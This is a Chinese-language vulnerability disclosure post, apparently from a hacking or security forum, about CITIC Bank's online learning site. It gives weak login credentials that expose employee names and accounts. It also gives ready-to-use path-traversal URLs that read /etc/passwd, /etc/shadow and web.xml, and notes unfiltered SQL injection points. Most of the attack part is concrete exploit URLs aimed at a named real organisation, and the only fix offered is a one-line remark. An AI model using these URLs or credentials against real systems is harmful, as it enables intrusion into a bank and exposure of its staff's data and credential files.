中信银行在线系统漏洞合集下载
-
来源:黑吧安全网 浏览:700次 时间:2014-07-12
中信银行在线系统漏洞汇总,弱口令,注入,任意下载,员工信息泄露等。
中信银行网络学院
http://learning.citicbank.com/
弱口令一枚:test test
进入后查看员工学习情况,包含员工姓名和账号信息。
任意文件下载:(root权限,很多敏感文件比如 shadow dbpasswd)
http://learning.citicbank.com/jsp/common/download.jsp?filepath=/resource/news/images/CMS12600/23200.rar
http://learning.citicbank.com/jsp/common/download.jsp?filepath=/WEB-INF/web.xml
http://learning.citicbank.com/jsp/common/download.jsp?filepath=.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd
http://learning.citicbank.com/jsp/common/download.jsp?filepath=.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/shadowSQL注入(db2 已经报错了,没时间手动构造了,而且系统内注入点还有很多,没有过滤)
在查询考试的时候:
报错信息:
修复方案:
整体提升安全吧。友情测试,点到即止。
上一篇: [公开漏洞]搜狐汽车某处持久性XSS漏洞
下一篇: [公开漏洞]悠哉旅行网某管理后台权限泄漏